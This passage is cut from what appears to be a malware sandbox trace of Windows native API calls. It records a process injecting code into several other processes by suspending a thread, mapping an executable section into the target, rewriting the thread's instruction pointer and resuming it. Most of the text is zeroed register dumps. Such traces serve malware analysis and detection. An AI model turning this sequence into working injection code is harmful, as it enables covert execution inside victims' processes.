[309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.289] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0137.289] NtClose (Handle=0x1a0) returned 0x0 [0137.289] NtClose (Handle=0x1a4) returned 0x0 [0137.291] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1110, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0137.291] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0137.291] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0137.291] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x256000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0137.291] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0137.300] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1114) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0137.300] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0137.300] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2070000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0137.306] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x256000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.308] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0137.308] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x153200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x154000) returned 0x0 [0137.315] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x153200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2a40000, SectionOffset=0x0, ViewSize=0xde6e8*=0x154000) returned 0x0 [0137.344] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0137.352] NtClose (Handle=0x1a8) returned 0x0 [0137.352] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x256000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2b00717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.357] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0137.359] NtClose (Handle=0x1a4) returned 0x0 [0137.359] NtClose (Handle=0x1a0) returned 0x0 [0137.359] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1118, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0137.359] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0137.360] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0137.360] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x2ac000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0137.360] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0137.362] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x111c) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0137.362] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0137.363] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2010000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0137.371] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, 